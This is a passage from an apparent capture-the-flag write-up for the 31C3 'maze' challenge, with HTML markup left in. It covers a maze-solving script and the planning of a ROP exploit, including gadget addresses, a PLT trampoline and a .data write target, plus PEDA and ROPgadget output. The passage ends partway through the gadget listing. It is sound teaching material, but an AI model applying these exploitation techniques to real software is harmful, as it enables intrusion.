\u00a0\u00a0\u00a0\u00a0<\/span>or<\/span>\u00a0\u00a0<\/span>(<\/span>y<\/span> ><\/span> 0<\/span>\u00a0\u00a0\u00a0\u00a0 <\/span>and<\/span> find_path<\/span>(<\/span>x<\/span>,<\/span> y<\/span>–<\/span>1<\/span>)<\/span>)<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>or<\/span>\u00a0\u00a0<\/span>(<\/span>x<\/span> ><\/span> 0<\/span>\u00a0\u00a0\u00a0\u00a0 <\/span>and<\/span> find_path<\/span>(<\/span>x<\/span>–<\/span>1<\/span>,<\/span> y<\/span>)<\/span>)<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>or<\/span>\u00a0\u00a0<\/span>(<\/span>y<\/span> <<\/span> max_y <\/span>and<\/span> find_path<\/span>(<\/span>x<\/span>,<\/span> y<\/span>+<\/span>1<\/span>)<\/span>)<\/span>)<\/span>:<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span># Inserting instead of appending, since we are backtracking<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>path<\/span>.<\/span>insert<\/span>(<\/span>0<\/span>,<\/span> (<\/span>x<\/span>,<\/span>y<\/span>)<\/span>)<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>return<\/span> True<\/span><\/div>\n
<\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>return<\/span> False<\/span><\/div>\n
<\/div>\n
—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span><\/div>\n
–<\/span> copy <\/span>the <\/span>code <\/span>from <\/span>maze<\/span>–<\/span>plot<\/span>.<\/span>py <\/span>here<\/span>,<\/span> in<\/span> order <\/span>to<\/span> set <\/span>max_x<\/span>,<\/span> max_y <\/span>and<\/span> arr<\/span><\/div>\n
—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span><\/div>\n
<\/div>\n
# Create two-dimensional array for the maze data<\/span><\/div>\n
maze<\/span> =<\/span> [<\/span>[<\/span>NONE <\/span>for<\/span> y<\/span> in<\/span> range<\/span>(<\/span>max_y<\/span>+<\/span>1<\/span>)<\/span>]<\/span> for<\/span> x<\/span> in<\/span> range<\/span>(<\/span>max_x<\/span>+<\/span>1<\/span>)<\/span>]<\/span><\/div>\n
<\/div>\n
# Populate it with the occupied squares<\/span><\/div>\n
for<\/span> pos <\/span>in<\/span> arr<\/span>:<\/span> maze<\/span>[<\/span>pos<\/span>[<\/span>0<\/span>]<\/span>]<\/span>[<\/span>pos<\/span>[<\/span>1<\/span>]<\/span>]<\/span> =<\/span> 1<\/span><\/div>\n
<\/div>\n
# Mark the “winning” position<\/span><\/div>\n
maze<\/span>[<\/span>goal_x<\/span>]<\/span>[<\/span>goal_y<\/span>]<\/span> =<\/span> GOAL<\/span><\/div>\n
<\/div>\n
path<\/span> =<\/span> None<\/span><\/div>\n
find_path<\/span>(<\/span>1<\/span>,<\/span> 1<\/span>)<\/span><\/div>\n
<\/div>\n
—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span><\/div>\n
–<\/span> path <\/span>now <\/span>contains <\/span>the<\/span> 518<\/span> steps <\/span>required <\/span>to<\/span> solve <\/span>the <\/span>maze<\/span> (<\/span>non<\/span>–<\/span>optimal<\/span>)<\/span><\/div>\n
—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span>—<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n

By connecting and sending the full solution to the maze we reach the vulnerable part of the code, i.e. the code that reads a name to add to the highscore list, in a fraction of a second. So, even if we need to make a few attempts in order to exploit it, due to ASLR, it will not make any real difference for us. Time to pwn. \ud83d\ude09<\/p>\n

Since the binary is so small, we don\u2019t have a lot of suitable ROP gadgets to play with. We need to find ways to use the ones we have as effectively as possible. My first attempt was to see if I could return into reached_goal(), right before the call to fopen(). We don\u2019t actually need to get code execution on the target to solve this challenge, to get the flag we only need to be able to read a file (and based on the other levels, it seemed like a reasonable guess that the flag was stored in either \/home\/user\/flag or \/home\/user\/flag.txt). The code in reached_goal() reads the current highscore file, and prints the last of the names in question.<\/p>\n

There is a problem with this approach though. We need to populate RDI with a pointer to a string with the filename we want to read, and at this point, we do not know the address of any buffer under our control. This problem is possible to solve by returning into read() though, in order to populate a buffer at an address of our choosing. A suitable address for this purpose must obviously be a valid and writable one, and since the target is a non-PIE-binary, the data segment for the executable itself resides at a fixed and known address. We can simply use 0x6060A0, which is the address of the .data section.<\/p>\n

Note that read() is a libc-function, and since we do not know the address where libc is mapped, we can not return directly into read(). If we had known the libc base address, we could have just returned directly into system() at this point, after populating RDI with the address of the \u201c\/bin\/sh\u201d string within libc itself. We solve this by returning into the PLT-entry for read(), since read() is one of the functions that are imported by the non-PIE target binary. The PLT-entry for read(), which acts as a trampoline into read() in libc, is stored at 0x400850.<\/p>\n

Since read() takes three arguments, that are passed in RDI, RSI and RDX respectively, we need to make a ROP chain that populates those registers before returning into read(). Ideally, our target binary would have contained instruction sequences such as \u201cpop rdi; ret\u201d, \u201cpop rsi; ret\u201d and \u201cpop rdx; ret\u201d, or even \u201cpop rdi; pop rsi; pop rdx; ret\u201d, but those instruction sequences are not commonly found in practice. Since x86 and x86_64 use variable-length instructions, that do not have to be aligned to any n-byte-boundary, it is possible to return into the middle of existing instructions though. By looking at partial instructions as well, we can find \u201cpop rdi; ret\u201d at 0x400f63 (the \u201cpop rdi\u201d instruction, opcode 0x5F, is actually the second byte of \u201cpop r15\u201d instruction) and \u201cpop rsi; pop r15; ret\u201d at 0x400f61 (the \u201cpop rsi\u201d, opcode 0x5E, is the second byte of a \u201cpop r14\u201d instruction), as you can see below:<\/p>\n

\"maze-rop-gadgets\"<\/a><\/p>\n

It doesn\u2019t matter that there is a \u201cpop r15\u201d instruction between the \u201cpop rsi\u201d and the \u201cret\u201d instruction, as long as we are able to populate the registers we care about, without any side effects that cause the program to crash (invalid memory accesses, etc), it suits our purposes just fine.<\/p>\n

Looking for ROP gadgets manually can be time-consuming though, especially for small binaries where there are few naturally occuring instruction sequences that are useful. Alternatives include using PEDA<\/a>, Python Exploit Development Assistance for GDB, as can be seen below:<\/p>\n

\n
<\/div>\n
\n\n\n\n
\n
\n
1<\/div>\n
2<\/div>\n
3<\/div>\n
4<\/div>\n
5<\/div>\n
6<\/div>\n
7<\/div>\n
8<\/div>\n
9<\/div>\n
10<\/div>\n
11<\/div>\n
12<\/div>\n
13<\/div>\n
14<\/div>\n
15<\/div>\n
16<\/div>\n
17<\/div>\n
18<\/div>\n
19<\/div>\n
20<\/div>\n<\/div>\n<\/td>\n
\n
\n
je<\/span>@<\/span>tiny<\/span>:<\/span>~<\/span>\/<\/span>31c3<\/span>\/<\/span>pwn<\/span>\/<\/span>maze<\/span>\/<\/span>je<\/span>$<\/span> gdb<\/span> –<\/span>q<\/span> maze<\/span><\/div>\n
Reading <\/span>symbols <\/span>from <\/span>maze<\/span>.<\/span>.<\/span>.<\/span>(<\/span>no <\/span>debugging <\/span>symbols <\/span>found<\/span>)<\/span>.<\/span>.<\/span>.<\/span>done<\/span>.<\/span><\/div>\n
gdb<\/span>–<\/span>peda<\/span>$<\/span> r<\/span><\/div>\n
Starting <\/span>program<\/span>:<\/span> \/<\/span>share<\/span>\/<\/span>2014<\/span>\/<\/span>31c3<\/span>\/<\/span>pwn<\/span>\/<\/span>maze<\/span>\/<\/span>je<\/span>\/<\/span>maze <\/span><\/div>\n
You <\/span>wake <\/span>up <\/span>and<\/span> have<\/span> a<\/span> big <\/span>headache<\/span>.<\/span><\/div>\n
You <\/span>are <\/span>in<\/span> a<\/span> dead <\/span>end<\/span>,<\/span> you <\/span>can <\/span>only <\/span>go <\/span>east<\/span>.<\/span> Where <\/span>do<\/span> you <\/span>want <\/span>to<\/span> go<\/span> (<\/span>today<\/span>)<\/span>?<\/span> ^<\/span>C<\/span><\/div>\n
.<\/span>.<\/span>.<\/span><\/div>\n
gdb<\/span>–<\/span>peda<\/span>$<\/span> ropsearch<\/span> “pop rdi”<\/span><\/div>\n
Searching <\/span>for<\/span> ROP <\/span>gadget<\/span>:<\/span> ‘pop rdi’<\/span> in<\/span>:<\/span> binary <\/span>ranges<\/span><\/div>\n
0x00400f63<\/span> :<\/span> (<\/span>5fc3<\/span>)<\/span>\u00a0\u00a0\u00a0\u00a0 <\/span>pop <\/span>rdi<\/span>;<\/span> ret<\/span><\/div>\n
0x00400ea2<\/span> :<\/span> (<\/span>5f5dc3<\/span>)<\/span>\u00a0\u00a0 <\/span>pop <\/span>rdi<\/span>;<\/span> pop <\/span>rbp<\/span>;<\/span> ret<\/span><\/div>\n
0x00400aaf<\/span> :<\/span> (<\/span>5f5dc3<\/span>)<\/span>\u00a0\u00a0 <\/span>pop <\/span>rdi<\/span>;<\/span> pop <\/span>rbp<\/span>;<\/span> ret<\/span><\/div>\n
gdb<\/span>–<\/span>peda<\/span>$<\/span> ropsearch<\/span> “pop rsi”<\/span><\/div>\n
Searching <\/span>for<\/span> ROP <\/span>gadget<\/span>:<\/span> ‘pop rsi’<\/span> in<\/span>:<\/span> binary <\/span>ranges<\/span><\/div>\n
0x00400f61<\/span> :<\/span> (<\/span>5e415fc3<\/span>)<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>pop <\/span>rsi<\/span>;<\/span> pop <\/span>r15<\/span>;<\/span> ret<\/span><\/div>\n
0x00400ea0<\/span> :<\/span> (<\/span>5e415f5dc3<\/span>)<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>pop <\/span>rsi<\/span>;<\/span> pop <\/span>r15<\/span>;<\/span> pop <\/span>rbp<\/span>;<\/span> ret<\/span><\/div>\n
0x00400aad<\/span> :<\/span> (<\/span>5e415f5dc3<\/span>)<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>pop <\/span>rsi<\/span>;<\/span> pop <\/span>r15<\/span>;<\/span> pop <\/span>rbp<\/span>;<\/span> ret<\/span><\/div>\n
gdb<\/span>–<\/span>peda<\/span>$<\/span> ropsearch<\/span> “pop rdx”<\/span><\/div>\n
Searching <\/span>for<\/span> ROP <\/span>gadget<\/span>:<\/span> ‘pop rdx’<\/span> in<\/span>:<\/span> binary <\/span>ranges<\/span><\/div>\n
Not<\/span> found<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n

As you can see above, there are unfortunately no suitable \u201cpop rdx\u201d gadgets. There may be other ways for us to populate RDX though, and for our purposes, we don\u2019t need to populate RDX with any specific value. Any non-zero value that is not too small is fine. The code we want to execute is read(0, ptr, N), where ptr is a pointer to a buffer that we are reading data into and N just needs to be at least as large as the data we want to read. As long as RDX still contains a non-zero value after the read(), even 1 might have been ok, if we can chain multiple calls to read().<\/p>\n

For a more complete listing of ROP gadgets, that we can inspect manually in order to see if we can find anything useful, the ROPgadget<\/a> tool by Jonathan Salwan can be used:<\/p>\n

\n
<\/div>\n
\n\n\n\n
\n
\n
1<\/div>\n
2<\/div>\n
3<\/div>\n
4<\/div>\n
5<\/div>\n
6<\/div>\n
7<\/div>\n
8<\/div>\n
9<\/div>\n
10<\/div>\n
11<\/div>\n
12<\/div>\n
13<\/div>\n
14<\/div>\n
15<\/div>\n
16<\/div>\n
17<\/div>\n
18<\/div>\n
19<\/div>\n
20<\/div>\n
21<\/div>\n
22<\/div>\n
23<\/div>\n
24<\/div>\n
25<\/div>\n
26<\/div>\n
27<\/div>\n
28<\/div>\n
29<\/div>\n
30<\/div>\n
31<\/div>\n
32<\/div>\n
33<\/div>\n
34<\/div>\n
35<\/div>\n
36<\/div>\n
37<\/div>\n
38<\/div>\n
39<\/div>\n
40<\/div>\n
41<\/div>\n
42<\/div>\n
43<\/div>\n
44<\/div>\n
45<\/div>\n
46<\/div>\n
47<\/div>\n
48<\/div>\n
49<\/div>\n
50<\/div>\n
51<\/div>\n
52<\/div>\n
53<\/div>\n
54<\/div>\n
55<\/div>\n
56<\/div>\n
57<\/div>\n
58<\/div>\n
59<\/div>\n
60<\/div>\n
61<\/div>\n
62<\/div>\n
63<\/div>\n
64<\/div>\n
65<\/div>\n
66<\/div>\n
67<\/div>\n
68<\/div>\n
69<\/div>\n
70<\/div>\n
71<\/div>\n
72<\/div>\n
73<\/div>\n
74<\/div>\n
75<\/div>\n
76<\/div>\n
77<\/div>\n
78<\/div>\n
79<\/div>\n
80<\/div>\n
81<\/div>\n
82<\/div>\n
83<\/div>\n
84<\/div>\n
85<\/div>\n
86<\/div>\n
87<\/div>\n
88<\/div>\n
89<\/div>\n
90<\/div>\n
91<\/div>\n
92<\/div>\n
93<\/div>\n
94<\/div>\n
95<\/div>\n
96<\/div>\n
97<\/div>\n
98<\/div>\n
99<\/div>\n
100<\/div>\n
101<\/div>\n
102<\/div>\n
103<\/div>\n
104<\/div>\n
105<\/div>\n
106<\/div>\n
107<\/div>\n
108<\/div>\n
109<\/div>\n
110<\/div>\n
111<\/div>\n
112<\/div>\n
113<\/div>\n
114<\/div>\n
115<\/div>\n
116<\/div>\n
117<\/div>\n<\/div>\n<\/td>\n
\n
\n
je<\/span>@<\/span>tiny<\/span>:<\/span>~<\/span>\/<\/span>31c3<\/span>\/<\/span>pwn<\/span>\/<\/span>maze<\/span>\/<\/span>je<\/span>$<\/span> ROPgadget<\/span> —<\/span>binary <\/span>maze <\/span><\/div>\n
Gadgets <\/span>information<\/span><\/div>\n
===<\/span>===<\/span>===<\/span>===<\/span>===<\/span>===<\/span>===<\/span>===<\/span>===<\/span>===<\/span>===<\/span>===<\/span>===<\/span>===<\/span>===<\/span>===<\/span>===<\/span>===<\/span>===<\/span>===<\/span><\/div>\n
0x0000000000400d95<\/span> :<\/span> add <\/span>al<\/span>,<\/span> 0<\/span> ;<\/span> add <\/span>byte<\/span> ptr<\/span> [<\/span>rbx<\/span> +<\/span> 0x41<\/span>]<\/span>,<\/span> bl<\/span> ;<\/span> pop <\/span>rsp<\/span> ;<\/span> pop <\/span>r13<\/span> ;<\/span> pop <\/span>rbp<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400cb7<\/span> :<\/span> add <\/span>al<\/span>,<\/span> 0x75<\/span> ;<\/span> mov <\/span>ah<\/span>,<\/span> 0x5d<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400f6f<\/span> :<\/span> add <\/span>bl<\/span>,<\/span> dh<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400c9f<\/span> :<\/span> add <\/span>byte<\/span> ptr<\/span> [<\/span>rax<\/span> –<\/span> 0x7d<\/span>]<\/span>,<\/span> cl<\/span> ;<\/span> ret<\/span> 0x4802<\/span><\/div>\n
0x0000000000400f6d<\/span> :<\/span> add <\/span>byte<\/span> ptr<\/span> [<\/span>rax<\/span>]<\/span>,<\/span> al<\/span> ;<\/span> add <\/span>bl<\/span>,<\/span> dh<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400c9d<\/span> :<\/span> add <\/span>byte<\/span> ptr<\/span> [<\/span>rax<\/span>]<\/span>,<\/span> al<\/span> ;<\/span> add <\/span>byte<\/span> ptr<\/span> [<\/span>rax<\/span> –<\/span> 0x7d<\/span>]<\/span>,<\/span> cl<\/span> ;<\/span> ret<\/span> 0x4802<\/span><\/div>\n
0x0000000000400f6b<\/span> :<\/span> add <\/span>byte<\/span> ptr<\/span> [<\/span>rax<\/span>]<\/span>,<\/span> al<\/span> ;<\/span> add <\/span>byte<\/span> ptr<\/span> [<\/span>rax<\/span>]<\/span>,<\/span> al<\/span> ;<\/span> add <\/span>bl<\/span>,<\/span> dh<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400c9b<\/span> :<\/span> add <\/span>byte<\/span> ptr<\/span> [<\/span>rax<\/span>]<\/span>,<\/span> al<\/span> ;<\/span> add <\/span>byte<\/span> ptr<\/span> [<\/span>rax<\/span>]<\/span>,<\/span> al<\/span> ;<\/span> add <\/span>byte<\/span> ptr<\/span> [<\/span>rax<\/span> –<\/span> 0x7d<\/span>]<\/span>,<\/span> cl<\/span> ;<\/span> ret<\/span> 0x4802<\/span><\/div>\n
0x0000000000400f6c<\/span> :<\/span> add <\/span>byte<\/span> ptr<\/span> [<\/span>rax<\/span>]<\/span>,<\/span> al<\/span> ;<\/span> add <\/span>byte<\/span> ptr<\/span> [<\/span>rax<\/span>]<\/span>,<\/span> al<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400c4c<\/span> :<\/span> add <\/span>byte<\/span> ptr<\/span> [<\/span>rax<\/span>]<\/span>,<\/span> al<\/span> ;<\/span> add <\/span>byte<\/span> ptr<\/span> [<\/span>rax<\/span>]<\/span>,<\/span> al<\/span> ;<\/span> xor<\/span> eax<\/span>,<\/span> eax<\/span> ;<\/span> pop <\/span>rbp<\/span> ;<\/span> ret<\/span><\/div>\n
0x00000000004007ab<\/span> :<\/span> add <\/span>byte<\/span> ptr<\/span> [<\/span>rax<\/span>]<\/span>,<\/span> al<\/span> ;<\/span> add <\/span>rsp<\/span>,<\/span> 8<\/span> ;<\/span> ret<\/span><\/div>\n
0x00000000004008c9<\/span> :<\/span> add <\/span>byte<\/span> ptr<\/span> [<\/span>rax<\/span>]<\/span>,<\/span> al<\/span> ;<\/span> jmp<\/span> 0x4007c9<\/span><\/div>\n
0x0000000000400c44<\/span> :<\/span> add <\/span>byte<\/span> ptr<\/span> [<\/span>rax<\/span>]<\/span>,<\/span> al<\/span> ;<\/span> pop <\/span>rbp<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400d96<\/span> :<\/span> add <\/span>byte<\/span> ptr<\/span> [<\/span>rax<\/span>]<\/span>,<\/span> al<\/span> ;<\/span> pop <\/span>rbx<\/span> ;<\/span> pop <\/span>r12<\/span> ;<\/span> pop <\/span>r13<\/span> ;<\/span> pop <\/span>rbp<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400f6e<\/span> :<\/span> add <\/span>byte<\/span> ptr<\/span> [<\/span>rax<\/span>]<\/span>,<\/span> al<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400c4e<\/span> :<\/span> add <\/span>byte<\/span> ptr<\/span> [<\/span>rax<\/span>]<\/span>,<\/span> al<\/span> ;<\/span> xor<\/span> eax<\/span>,<\/span> eax<\/span> ;<\/span> pop <\/span>rbp<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400d97<\/span> :<\/span> add <\/span>byte<\/span> ptr<\/span> [<\/span>rbx<\/span> +<\/span> 0x41<\/span>]<\/span>,<\/span> bl<\/span> ;<\/span> pop <\/span>rsp<\/span> ;<\/span> pop <\/span>r13<\/span> ;<\/span> pop <\/span>rbp<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400be8<\/span> :<\/span> add <\/span>byte<\/span> ptr<\/span> [<\/span>rcx<\/span>]<\/span>,<\/span> al<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400c42<\/span> :<\/span> add <\/span>dword <\/span>ptr<\/span> [<\/span>rax<\/span>]<\/span>,<\/span> eax<\/span> ;<\/span> add <\/span>byte<\/span> ptr<\/span> [<\/span>rax<\/span>]<\/span>,<\/span> al<\/span> ;<\/span> pop <\/span>rbp<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400cb4<\/span> :<\/span> add <\/span>dword <\/span>ptr<\/span> [<\/span>rbx<\/span> –<\/span> 0x4b8afb07<\/span>]<\/span>,<\/span> eax<\/span> ;<\/span> pop <\/span>rbp<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400be4<\/span> :<\/span> add <\/span>eax<\/span>,<\/span> 0x205586<\/span> ;<\/span> add <\/span>ebx<\/span>,<\/span> esi<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400bab<\/span> :<\/span> add <\/span>eax<\/span>,<\/span> edx<\/span> ;<\/span> sar <\/span>rax<\/span>,<\/span> 1<\/span> ;<\/span> jne<\/span> 0x400bbc<\/span> ;<\/span> pop <\/span>rbp<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400be9<\/span> :<\/span> add <\/span>ebx<\/span>,<\/span> esi<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400cb2<\/span> :<\/span> add <\/span>ecx<\/span>,<\/span> 1<\/span> ;<\/span> cmp <\/span>ecx<\/span>,<\/span> 4<\/span> ;<\/span> jne<\/span> 0x400c77<\/span> ;<\/span> pop <\/span>rbp<\/span> ;<\/span> ret<\/span><\/div>\n
0x00000000004007ae<\/span> :<\/span> add <\/span>esp<\/span>,<\/span> 8<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400baa<\/span> :<\/span> add <\/span>rax<\/span>,<\/span> rdx<\/span> ;<\/span> sar <\/span>rax<\/span>,<\/span> 1<\/span> ;<\/span> jne<\/span> 0x400bbd<\/span> ;<\/span> pop <\/span>rbp<\/span> ;<\/span> ret<\/span><\/div>\n
0x00000000004007ad<\/span> :<\/span> add <\/span>rsp<\/span>,<\/span> 8<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400be7<\/span> :<\/span> and<\/span> byte<\/span> ptr<\/span> [<\/span>rax<\/span>]<\/span>,<\/span> al<\/span> ;<\/span> add <\/span>ebx<\/span>,<\/span> esi<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400f49<\/span> :<\/span> call <\/span>qword <\/span>ptr<\/span> [<\/span>r12<\/span> +<\/span> rbx*<\/span>8<\/span>]<\/span><\/div>\n
0x0000000000400f4a<\/span> :<\/span> call <\/span>qword <\/span>ptr<\/span> [<\/span>rsp<\/span> +<\/span> rbx*<\/span>8<\/span>]<\/span><\/div>\n
0x0000000000400c0d<\/span> :<\/span> call <\/span>rax<\/span><\/div>\n
0x0000000000400baf<\/span> :<\/span> clc<\/span> ;<\/span> jne<\/span> 0x400bb8<\/span> ;<\/span> pop <\/span>rbp<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400c3e<\/span> :<\/span> cmp <\/span>byte<\/span> ptr<\/span> [<\/span>rbp<\/span> –<\/span> 0x11<\/span>]<\/span>,<\/span> dh<\/span> ;<\/span> mov <\/span>eax<\/span>,<\/span> 1<\/span> ;<\/span> pop <\/span>rbp<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400b6d<\/span> :<\/span> cmp <\/span>eax<\/span>,<\/span> 0xe<\/span> ;<\/span> mov <\/span>rbp<\/span>,<\/span> rsp<\/span> ;<\/span> ja<\/span> 0x400b80<\/span> ;<\/span> pop <\/span>rbp<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400cb5<\/span> :<\/span> cmp <\/span>ecx<\/span>,<\/span> 4<\/span> ;<\/span> jne<\/span> 0x400c74<\/span> ;<\/span> pop <\/span>rbp<\/span> ;<\/span> ret<\/span><\/div>\n
0x00000000004019da<\/span> :<\/span> cvttps2pi <\/span>mm1<\/span>,<\/span> qword <\/span>ptr<\/span> [<\/span>rdi<\/span>]<\/span> ;<\/span> rdmsr<\/span> ;<\/span> sysenter<\/span><\/div>\n
0x0000000000400f4c<\/span> :<\/span> fmul <\/span>qword <\/span>ptr<\/span> [<\/span>rax<\/span> –<\/span> 0x7d<\/span>]<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400b80<\/span> :<\/span> hlt<\/span> ;<\/span> pop <\/span>rbp<\/span> ;<\/span> mov <\/span>edi<\/span>,<\/span> 0x606160<\/span> ;<\/span> jmp <\/span>rax<\/span><\/div>\n
0x0000000000400b73<\/span> :<\/span> ja<\/span> 0x400b7a<\/span> ;<\/span> pop <\/span>rbp<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400b7f<\/span> :<\/span> je<\/span> 0x400b7d<\/span> ;<\/span> pop <\/span>rbp<\/span> ;<\/span> mov <\/span>edi<\/span>,<\/span> 0x606160<\/span> ;<\/span> jmp <\/span>rax<\/span><\/div>\n
0x00000000004008cb<\/span> :<\/span> jmp<\/span> 0x4007c7<\/span><\/div>\n
0x0000000000405803<\/span> :<\/span> jmp <\/span>qword <\/span>ptr<\/span> [<\/span>rax<\/span>]<\/span><\/div>\n
0x0000000000400b87<\/span> :<\/span> jmp <\/span>rax<\/span><\/div>\n
0x0000000000400bc7<\/span> :<\/span> jmp <\/span>rdx<\/span><\/div>\n
0x0000000000400bb0<\/span> :<\/span> jne<\/span> 0x400bb7<\/span> ;<\/span> pop <\/span>rbp<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400c3f<\/span> :<\/span> jne<\/span> 0x400c38<\/span> ;<\/span> mov <\/span>eax<\/span>,<\/span> 1<\/span> ;<\/span> pop <\/span>rbp<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400cb8<\/span> :<\/span> jne<\/span> 0x400c71<\/span> ;<\/span> pop <\/span>rbp<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400cb9<\/span> :<\/span> mov <\/span>ah<\/span>,<\/span> 0x5d<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400be3<\/span> :<\/span> mov <\/span>byte<\/span> ptr<\/span> [<\/span>rip<\/span> +<\/span> 0x205586<\/span>]<\/span>,<\/span> 1<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400c41<\/span> :<\/span> mov <\/span>eax<\/span>,<\/span> 1<\/span> ;<\/span> pop <\/span>rbp<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400c0b<\/span> :<\/span> mov <\/span>ebp<\/span>,<\/span> esp<\/span> ;<\/span> call <\/span>rax<\/span><\/div>\n
0x0000000000400b71<\/span> :<\/span> mov <\/span>ebp<\/span>,<\/span> esp<\/span> ;<\/span> ja<\/span> 0x400b7c<\/span> ;<\/span> pop <\/span>rbp<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400c05<\/span> :<\/span> mov <\/span>edi<\/span>,<\/span> 0x605e20<\/span> ;<\/span> mov <\/span>rbp<\/span>,<\/span> rsp<\/span> ;<\/span> call <\/span>rax<\/span><\/div>\n
0x0000000000400b82<\/span> :<\/span> mov <\/span>edi<\/span>,<\/span> 0x606160<\/span> ;<\/span> jmp <\/span>rax<\/span><\/div>\n
0x0000000000400bc2<\/span> :<\/span> mov <\/span>edi<\/span>,<\/span> 0x606160<\/span> ;<\/span> jmp <\/span>rdx<\/span><\/div>\n
0x0000000000400f47<\/span> :<\/span> mov <\/span>edi<\/span>,<\/span> edi<\/span> ;<\/span> call <\/span>qword <\/span>ptr<\/span> [<\/span>r12<\/span> +<\/span> rbx*<\/span>8<\/span>]<\/span><\/div>\n
0x0000000000400f46<\/span> :<\/span> mov <\/span>edi<\/span>,<\/span> r15d<\/span> ;<\/span> call <\/span>qword <\/span>ptr<\/span> [<\/span>r12<\/span> +<\/span> rbx*<\/span>8<\/span>]<\/span><\/div>\n
0x0000000000400bc0<\/span> :<\/span> mov <\/span>esi<\/span>,<\/span> eax<\/span> ;<\/span> mov <\/span>edi<\/span>,<\/span> 0x606160<\/span> ;<\/span> jmp <\/span>rdx<\/span><\/div>\n
0x0000000000400c0a<\/span> :<\/span> mov <\/span>rbp<\/span>,<\/span> rsp<\/span> ;<\/span> call <\/span>rax<\/span><\/div>\n
0x0000000000400b70<\/span> :<\/span> mov <\/span>rbp<\/span>,<\/span> rsp<\/span> ;<\/span> ja<\/span> 0x400b7d<\/span> ;<\/span> pop <\/span>rbp<\/span> ;<\/span> ret<\/span><\/div>\n
0x0000000000400bbf<\/span> :<\/span> mov <\/span>rsi<\/span>,<\/span> rax<\/span> ;<\/span> mov <\/span>edi<\/span>,<\/span> 0x606160<\/span> ;<\/span> jmp <\/span>rdx<\/span><\/div>\n
0x00000000004019d8<\/span> :<\/span> movaps <\/span>xmm1<\/span>,<\/span> xmmword <\/span>ptr<\/span> [<\/span>rdi<\/span>]<\/span> ;<\/span> sub <\/span>al<\/span>,<\/span> 0xf<\/span> ;<\/span> rdmsr<\/span> ;<\/span> sysenter<\/span><\/div>\n
